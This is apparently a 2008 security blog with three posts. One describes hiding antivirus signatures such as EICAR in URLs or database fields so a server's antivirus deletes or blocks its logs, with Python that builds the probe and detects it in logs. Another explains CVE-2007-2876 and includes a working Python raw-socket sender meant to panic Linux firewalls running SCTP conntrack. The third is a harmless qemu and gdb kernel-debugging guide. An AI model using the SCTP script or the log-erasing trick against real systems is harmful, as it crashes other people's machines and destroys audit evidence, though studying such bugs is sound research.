Wednesday, June 25, 2008

Erasing or blocking logs remotely

On Monday I dreamt up some new web-hacking techniques; now I only remember one:

If you put an EICAR test string, a LoveLetter fragment or any other virus signature in the URL, the antivirus on the web server may block or delete the log files that record the request; and if the pattern is merely suspicious, the logfile may even be uploaded to the AV vendor as a sample.

ex: http://web.com/index.php?<virus pattern>


What about inserting these patterns into the database? If you register on a website and the pattern ends up stored in the database, some database files may be blocked or deleted by the antivirus.

This can also be a vector for exploiting flaws in the local AV engine itself, since it is forced to parse attacker-controlled content.

NOTE: only Panda detects EICAR strings that are not at the beginning of the file; other patterns must be used.
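As an added example (not part of the original post), here is what actually lands in a web server log when the EICAR test string is sent in a query string, plus the check a defender would run over the logs to spot such probes. The log lines are constructed for this example, the Apache escaping is an approximation of ap_escape_logitem(), and the host name is the one from the post.

```python
import re
from urllib.parse import quote, unquote

# The public EICAR test string, built from two halves so that this file does not
# itself start with the byte-exact signature when saved to disk.
EICAR = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$" + "EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
EICAR_MARKER = "EICAR-STANDARD-ANTIVIRUS-TEST-FILE"


def probe_url(pattern=EICAR, base="http://web.com/index.php"):
    """The URL from the post as a browser or curl actually puts it on the wire:
    every reserved character of the pattern percent-encoded."""
    return base + "?" + quote(pattern, safe="")


def apache_escape(s):
    """Approximation of Apache's ap_escape_logitem(), applied to %r before the
    line is written to access.log: backslash and double quote get a backslash
    in front, bytes outside printable ASCII become \\xNN."""
    out = []
    for ch in s:
        if ch == "\\":
            out.append("\\\\")
        elif ch == '"':
            out.append('\\"')
        elif not 0x20 <= ord(ch) <= 0x7E:
            out.append("\\x%02x" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)


def combined_log_line(query, client="203.0.113.5"):
    """Constructed Apache combined-format entry for GET /index.php?<query>."""
    request = apache_escape("GET /index.php?" + query + " HTTP/1.1")
    return (f'{client} - - [25/Jun/2008:10:00:00 +0200] "{request}" 200 512 '
            '"-" "curl/7.18.0"')


def apache_unescape(s):
    """Undo apache_escape() so the request can be compared byte for byte."""
    return re.sub(r"\\x([0-9a-fA-F]{2})|\\(.)",
                  lambda m: chr(int(m.group(1), 16)) if m.group(1) else m.group(2), s)


# Request line inside the quotes, tolerating backslash-escaped characters.
REQUEST_RE = re.compile(r'"([A-Z]+ [^"\\]*(?:\\.[^"\\]*)*) HTTP/[0-9.]+"')


def find_av_test_probes(lines, marker=EICAR_MARKER):
    """Defender's check: entries whose request, once log escaping and percent
    encoding are undone, carries the EICAR marker. Returns (line_no, request)."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        request = unquote(apache_unescape(m.group(1)))
        if marker in request:
            hits.append((n, request))
    return hits


# Constructed sample log: a raw-socket client sending the bytes unencoded, a
# normal HTTP client percent-encoding them, and an ordinary request.
SAMPLE_LOG = [
    combined_log_line(EICAR),
    combined_log_line(quote(EICAR, safe="")),
    combined_log_line("id=42"),
]

if __name__ == "__main__":
    print(probe_url())
    for line in SAMPLE_LOG:
        print(line)
    for n, req in find_av_test_probes(SAMPLE_LOG):
        print(f"line {n}: AV test pattern in request {req!r}")
```

Two things follow that are worth knowing before trying this against Apache: a browser or curl percent-encodes the reserved characters, so the log holds %5C rather than the backslash, and even a raw client that sends the bytes unencoded gets the backslash doubled by the log escaping, so the byte-exact EICAR signature never appears in the access log. On top of that, the EICAR convention requires the string at offset 0 of the file, which matches the NOTE above about Panda being the only engine that flags it mid-file.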

Monday, June 16, 2008

Linux remote null pointer dereference (CVE-2007-2876)

The Linux netfilter SCTP connection tracker (nf_conntrack_sctp) has a NULL pointer dereference that can be triggered remotely. When a new connection is created, sctp_new() asks new_state() which state the first chunk leads to:

    /* in sctp_new() */
    newconntrack = new_state(IP_CT_DIR_ORIGINAL, SCTP_CONNTRACK_NONE, sch->type);
    if (newconntrack == SCTP_CONNTRACK_MAX) {
        pr_debug("nf_conntrack_sctp: invalid new deleting.\n");
        return 0;
    }

SCTP_CONNTRACK_MAX is rejected, but SCTP_CONNTRACK_NONE (0) should be rejected as well: new_state() returns the current state unchanged for chunk types that are not in its state table, and here the current state is SCTP_CONNTRACK_NONE. The value is stored anyway:

    conntrack->proto.sctp.state = newconntrack;

So the state stays zero.

Then sctp_packet(), which computes the verdict for the packet, reads that state of 0:

    oldsctpstate = conntrack->proto.sctp.state;
    newconntrack = new_state(CTINFO2DIR(ctinfo), oldsctpstate, sch->type);

and dereferences a NULL pointer:

    nf_ct_refresh_acct(conntrack, ctinfo, skb, *sctp_timeouts[newconntrack]);

because sctp_timeouts[SCTP_CONNTRACK_NONE] is NULL: the table holds pointers to the per-state timeout values and there is none for SCTP_CONNTRACK_NONE, so the * dereferences NULL:

    static unsigned int *sctp_timeouts[] = {
        NULL,                                   /* SCTP_CONNTRACK_NONE */
        &nf_ct_sctp_timeout_closed,             /* SCTP_CONNTRACK_CLOSED */
        &nf_ct_sctp_timeout_cookie_wait,        /* SCTP_CONNTRACK_COOKIE_WAIT */
        &nf_ct_sctp_timeout_cookie_echoed,      /* SCTP_CONNTRACK_COOKIE_ECHOED */
        &nf_ct_sctp_timeout_established,        /* SCTP_CONNTRACK_ESTABLISHED */
        &nf_ct_sctp_timeout_shutdown_sent,      /* SCTP_CONNTRACK_SHUTDOWN_SENT */
        &nf_ct_sctp_timeout_shutdown_recd,      /* SCTP_CONNTRACK_SHUTDOWN_RECD */
        &nf_ct_sctp_timeout_shutdown_ack_sent   /* SCTP_CONNTRACK_SHUTDOWN_ACK_SENT */
    };


To exploit this you might think of creating a
    socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP)
and setting its state to zero through the SCTP_STATUS sockopt. But that option is read only, and the kernel's SCTP stack always opens an association with a proper INIT, so you have to construct the raw SCTP packet yourself :)

The victim must be tracking SCTP with netfilter (nf_conntrack_proto_sctp loaded), typically a firewall in front of an SCTP service. Incoming packets are tracked from the NET_RX softirq, so the oops happens in interrupt context, and an oops there is a fatal exception that panics the kernel: the box goes down rather than just losing a process.
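The raw SCTP packet the post says you need, as an added example in Python rather than the post's own code. Two details are my reading of the conntrack source and are not stated in the post: the probe carries a single DATA chunk (type 0), because new_state() returns the current state unchanged for chunk types outside its state table, which is how SCTP_CONNTRACK_NONE survives sctp_new(); and the verification tag is 0, because a freshly created conntrack has vtag 0 for the original direction and sctp_packet() checks it for DATA chunks. Ports and destination address are placeholders.

```python
import socket
import struct
import sys

SCTP_CID_DATA = 0
IPPROTO_SCTP = getattr(socket, "IPPROTO_SCTP", 132)


def crc32c(data: bytes) -> int:
    """CRC-32C (Castagnoli), bit-serial, as required by RFC 4960 Appendix B."""
    crc = 0xFFFFFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ (0x82F63B78 if crc & 1 else 0)
    return crc ^ 0xFFFFFFFF


def sctp_data_chunk(payload: bytes, tsn: int = 1, stream: int = 0, ppid: int = 0) -> bytes:
    """DATA chunk: type, flags (B|E = one unfragmented message), length, TSN,
    stream id, stream seq, payload protocol id, then user data padded to 4 bytes.
    The length field excludes the padding."""
    length = 16 + len(payload)
    chunk = struct.pack("!BBHIHHI", SCTP_CID_DATA, 0x03, length, tsn, stream, 0, ppid) + payload
    return chunk + b"\x00" * (-len(chunk) % 4)


def make_sctp_packet(sport: int, dport: int, vtag: int, chunks: bytes) -> bytes:
    """Common header with the checksum filled in: CRC32c over the packet with the
    checksum field zeroed, stored in little-endian byte order."""
    hdr = struct.pack("!HHII", sport, dport, vtag, 0)
    crc = crc32c(hdr + chunks)
    return hdr[:8] + struct.pack("<I", crc) + chunks


def checksum_ok(pkt: bytes) -> bool:
    """Recompute the CRC32c the way a receiver does."""
    stored = struct.unpack("<I", pkt[8:12])[0]
    return crc32c(pkt[:8] + b"\x00" * 4 + pkt[12:]) == stored


def parse(pkt: bytes) -> dict:
    """Decode the common header and the first chunk header, for inspection."""
    sport, dport, vtag = struct.unpack("!HHI", pkt[:8])
    csum = struct.unpack("<I", pkt[8:12])[0]
    ctype, cflags, clen = struct.unpack("!BBH", pkt[12:16])
    return dict(sport=sport, dport=dport, vtag=vtag, checksum=csum,
                chunk_type=ctype, chunk_flags=cflags, chunk_len=clen)


def build_probe(dport: int, sport: int = 9) -> bytes:
    """The probe: vtag 0 (assumption, see lead-in) and one DATA chunk (assumption)."""
    return make_sctp_packet(sport, dport, 0, sctp_data_chunk(b"x"))


def send_probe(dst_ip: str, dport: int) -> int:
    """Raw socket: the kernel prepends the IP header; needs CAP_NET_RAW."""
    pkt = build_probe(dport)
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, IPPROTO_SCTP) as s:
        s.sendto(pkt, (dst_ip, 0))
    return len(pkt)


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit(f"usage: {sys.argv[0]} <dst-ip> <dst-port>")
    print("sent", send_probe(sys.argv[1], int(sys.argv[2])), "bytes")
```

Run it as root against a lab box only. nf_conntrack_proto_sctp also tracks locally generated packets on the OUTPUT hook, so the sending host should not have the vulnerable module loaded. Kernels carrying the fix reject SCTP_CONNTRACK_NONE in sctp_new() alongside SCTP_CONNTRACK_MAX and simply drop the probe.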

Sunday, June 08, 2008

kernel hacking

I haven't tried all the kernel debuggers for Linux, but the most decent thing I've found for displaying the structures is ddd connected through tap0 to qemu in -s mode.


1. Download the sources of the kernel to debug

In the kernel's .config we enable debugging support.
Since we'll debug this kernel under qemu, we can have all the debug options enabled, mainly these:

.config
CONFIG_DEBUG_KERNEL=y
CONFIG_DEBUG_BUGVERBOSE=y
CONFIG_DEBUG_INFO=y
CONFIG_DEBUG_STACKOVERFLOW=y
CONFIG_DEBUG_PAGEALLOC=y

compile with make

2. We need to create an image.img with dd, format it (e.g. ext2) and create a Linux subsystem inside it, e.g. with Debian's debootstrap :)

mount it:
modprobe loop
mount image.img img/ -o loop

if the loop driver doesn't load, you surely have it somewhere, look for it ;)


3. qemu

We have the disk image image.img, the compressed kernel bzImage and the uncompressed vmlinux.
We boot qemu with the disk image and the bzImage:

qemu -boot c -kernel linux-2.6.*.*/arch/i386/boot/bzImage -hda ./image.img -append "root=/dev/hda clock=pit" -s

-s is the kernel debug mode: it opens a gdb stub on port 1234


4. ddd or gdb

ddd has the advantage that we can draw the structures.

We start ddd with the freshly compiled vmlinux (bzImage won't do, it carries no symbols).
ddd vmlinux

(gdb) target remote localhost:1234

let's check it:
(gdb) b sys_open
(gdb) c

try for example a simple ls in the guest, which will invoke the open syscall

Now with ddd we can display any structure, e.g.:
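The four steps above driven from one script, as an added example that is not code from the original post. Placeholders to adjust: the kernel tree in ./linux, Debian suite "etch" from archive.debian.org, a 512 MB image, and an i386 kernel with 8 KB stacks (THREAD_SIZE = 8192), which the `current` trick in the gdb commands relies on. It adds two things the post does not mention: qemu's -S, which holds the CPU until gdb continues so breakpoints can be set before boot, and how to reach task_struct from gdb when `current` (a macro) cannot be evaluated.

```python
import os
import subprocess
import sys

KSRC = os.environ.get("KSRC", "./linux")      # kernel tree built with CONFIG_DEBUG_INFO
IMG = os.environ.get("IMG", "image.img")
MNT = os.environ.get("MNT", "img")
SUITE = os.environ.get("SUITE", "etch")       # placeholder Debian release
MIRROR = os.environ.get("MIRROR", "http://archive.debian.org/debian")
GDB_PORT = 1234                               # what qemu -s listens on


def image_commands(img=IMG, mnt=MNT, size_mb=512):
    """Step 2: empty image, ext2 on it, Debian inside via debootstrap (run as root)."""
    return [
        ["dd", "if=/dev/zero", f"of={img}", "bs=1M", f"count={size_mb}"],
        ["mkfs.ext2", "-F", img],
        ["mkdir", "-p", mnt],
        ["modprobe", "loop"],
        ["mount", "-o", "loop", img, mnt],
        ["debootstrap", "--arch", "i386", SUITE, mnt, MIRROR],
        ["umount", mnt],
    ]


def qemu_command(ksrc=KSRC, img=IMG):
    """Step 3. -s opens the gdb stub on tcp/1234; -S keeps the CPU halted until
    gdb says continue, so breakpoints can be set before the kernel boots."""
    return ["qemu", "-s", "-S", "-boot", "c",
            "-kernel", f"{ksrc}/arch/i386/boot/bzImage",
            "-hda", img, "-append", "root=/dev/hda clock=pit"]


def gdb_commands(port=GDB_PORT):
    """Step 4: commands for gdb (or `source cmds.gdb` at ddd's (gdb) prompt).
    `current` is a macro gdb cannot expand; on i386 thread_info sits at the
    bottom of the 8 KB kernel stack, so task_struct is reached through $esp."""
    cur = "((struct thread_info *)($esp & ~8191))->task"
    return "\n".join([
        f"target remote localhost:{port}",
        "break sys_open",
        "continue",
        "# run `ls` in the guest; the breakpoint fires with the syscall args in scope",
        "x/s filename",
        f"print {cur}->comm",
        f"print *{cur}",
    ]) + "\n"


def run(cmds):
    for cmd in cmds:
        subprocess.run(cmd, check=True)


if __name__ == "__main__":
    step = sys.argv[1] if len(sys.argv) > 1 else ""
    if step == "image":
        run(image_commands())
    elif step == "boot":
        run([qemu_command()])
    elif step == "gdb":
        with open("cmds.gdb", "w") as f:
            f.write(gdb_commands())
        run([["gdb", "-x", "cmds.gdb", f"{KSRC}/vmlinux"]])   # or: ddd vmlinux, then source cmds.gdb
    else:
        sys.exit(f"usage: {sys.argv[0]} image|boot|gdb")
```

With CONFIG_4KSTACKS the mask becomes ~4095; on a kernel with CONFIG_DEBUG_INFO=y the `print *...->task` output is the full task_struct, which is the structure ddd can then draw.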



kernel developer sha0wiki